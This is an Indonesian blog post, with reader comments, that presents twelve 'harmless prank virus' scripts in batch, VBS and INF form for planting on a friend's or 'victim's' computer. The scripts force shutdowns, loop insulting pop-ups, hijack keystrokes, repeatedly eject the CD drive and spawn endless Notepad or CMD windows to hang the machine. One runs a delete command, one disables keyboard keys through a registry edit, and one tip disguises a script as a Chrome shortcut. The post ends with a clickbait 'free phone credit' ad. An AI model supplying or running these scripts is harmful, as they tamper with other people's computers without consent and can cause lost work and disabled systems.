Cara Membuat virus Nakal dan tidak berbahaya menggunakan Notepad

                                                             بِسْمِ اللهِ الرَّحْمَانِ الرَّحِيْمِ


Cara membuat virus nakal





hay sobat Blogger kali ini ane mau psoting tentang berbagai macam trik jail di komputer unutk ngerjain teman  dengan hanya menggunakan program bawaan windows yaitu notepad  hehe :)
langsung aja gak ussah basa basi lagi..!!!




TRIK 1  - Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : Terserah anda.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN


TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : Terserah anda.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)


TRIK 3 - Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih, 
msg * hayo lo,System lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

------------------------------------------------------

simpan kode script yang berwarna hijau dengan nama Terserah anda.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
Untuk mematikan atau menghentikan cara membuat pesai jail terus menerus yaitu dengan cara :
Tekan CRTL + SHIFT + ESC --> Pilih Processes-->cari dan Klik CMD.exe ,kemudian Klik tekan END Processsetelah itu tekan Ok secara terus menerus sampai hilang..selesai mudah bukan??



TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
simpan di Notepad kode warna kuning tersebut dengan nama : Terserah anda .vbs
type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,


TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-------------------------------------------------------
simpan kode warna ungu tersebut di Notepad dengan nama : Terserah anda.vbs type file : All File
membuat script bermunculan terus menerus


TRIK 6 - Membuat Tombol Backspace menjadi eror menggunakan notepad
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berwarna Merah tersebut di Notepad
dengan nama : Terserah anda.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya


TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
-----------------------------------------------------------
ganti kata yang Berwarna merah dengan selera Anda, simpan di Notepad dengan nama : Terserah anda.vbs


TRIK 8 - Cara Membuat Komputer Hank gara gara Notepad terbuka terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------
simpan kode berwarna Merah tersebut di Notepad dengan nama : Terserah anda.BAT
maka Notepad akan terbuka terus menerus




TRIK 9 - Membuat Pesan jail menggunakan Notepad
-------------------------------------------------------------

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : Terserah anda.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.


TRIK 10 - Cara Membuat jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan?
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo Jelek
msg * ngaca dulu gih sana
msg * hayo loe,System lu gw udah acak2
msg * udah install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top -----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : Terserah anda.BAT



TRIK 11 - Membuat CMD Terbuka terus menerus Menggunakan Notepad
-------------------------------------------------------------

start

start

start

start

start

start

start

start

start

start

start

start
-----------------------------------------------------------
simpan di Notepad dengan nama : Terserah Anda.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser Chrome, terus taro aja di desktop Yang ingin kamu jahili..:)
NB:semakin banyak kata start tertulis di notepad tersebut,maka begitu pula banyaknya CMD terbuka secara terus menerus



TRIK 12 - Cara Mematikan Fungsi Tombol pada Keyboard
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama Terserah Anda.INF

Langsung kita mulai saja :

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00

—————————————

2. Untuk menjalankannya, klik kanan nama file Terserah Anda.INF dan pilih menu> Install

3. Log Off komputermu agar trik ini berfungsi.

NB :

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

Untuk menormalkannya, silahkan salin script berikut :

—————————————

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal

[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

———————————

—> Simpan dengan nama “NORMAL.INF”
Klik kanan file ini, pilih >Install
Log Off komputer mu

Selamat Mencoba!!

Dari Pada kamu Kerjaain Teman kamu,Lebih baik Kamu coba tips ini untuk mendapatkan Pulsa Secara Gratis Terbaru di jamin Work

Klik Untuk melihat yang terbaru di blog saya

29 Responses to "Cara Membuat virus Nakal dan tidak berbahaya menggunakan Notepad"

  1. mantap juga nih gan..
    thanks infonya..

    ReplyDelete
    Replies
    1. Gan misalnya mau balikin trik 7 ke semula gimana gan ???

      Delete
  2. virusnya.....
    MANTAP
    lumayan buat kerjain temen biar gak terlalu sering main komputer

    ReplyDelete
    Replies
    1. monggo..!!! dosa tanggung sendiri yah.. :D !

      Delete
  3. kalo mau di hilangin gmna gan ? apa tinggal hapus aja datanya ?

    ReplyDelete
  4. Gan cara mematikan smua trik.a gmna gan ?

    ReplyDelete
    Replies
    1. jangan coba semua gan.. -_-
      kerusakan pada laptop agan bukan tanggung jawab saya..
      coba aja satu satu,karna ada sebagian trik yang bisa di hentikan dan ada juga yang tidak..
      :-d

      Delete
  5. gan trik nomor 3 bisa di hilangi gk

    ReplyDelete
    Replies
    1. caranya :
      lihat postingan aja gan,!!!
      gua udah update!!

      Delete
  6. gan kalo keyboardnya diganti baru, apa A I U E O nya bisa normal kembali apa gak??
    (mau nyoba nih buat komputer...)

    ReplyDelete
  7. https://lh5.googleusercontent.com/-XCXdaCYaOGE/T2WEcmd15EI/AAAAAAAACbQ/Z5UyZCuX4Xo/s36/20.gif

    gimana ngilangin firus nya gan

    ReplyDelete
    Replies
    1. trik yang bagian mana? Coba sebutin gan !

      Delete
  8. mas kalo menghentikan trik nomer 4 gimana gan?
    tolong pencerahannya

    ReplyDelete
  9. klo trik nomer 4 bisa di hapus gk nih??
    tolong pencerahannya

    ReplyDelete
    Replies
    1. Terima kasih telah berkomentar gan..
      Unutuk cara menghapusnya!!
      1.klik CTRL+Shit+ESC (task manager)
      2.Klik poreses,
      3.cari wscript.exe , Klik kanan kemudian Klik End proses

      Sekian gan,semoga bisa membantu!!

      Delete
  10. Thanks infonya sangat bermanfaat sob,semoga berguna bagi semua orang terutama bagi saya.
    Jika berkenan kunjungilah blog saya http://andom99.blogspot.com/
    dan follow me @ andri_gs99

    ReplyDelete
    Replies
    1. sama sama ga,terima kasih telah berkomentar cara membuat virus sederhana!!

      Delete
  11. Parah nih!!!
    terus tingkatkan mas!!!

    ReplyDelete
  12. keren gan,ijin share postingannya gan!!!

    ReplyDelete
  13. Jika file tersebut di kirim via email bisa gak.?

    ReplyDelete
  14. This comment has been removed by the author.

    ReplyDelete
  15. bikin virus yg bisa bikin komputer meledak gan.

    ReplyDelete
  16. trik-trik yg nomor berapa aja yg bisa di END proces gan?

    ReplyDelete

Rules Kumpulan Tips dan trik syaikal.blogspot.com
1.berkomentar lah dengan kata kata yang sopan
2.Janganlah menggunakan kata kata kotor
3.menggunakan kata kata kotor itu = mengolok anda sendiri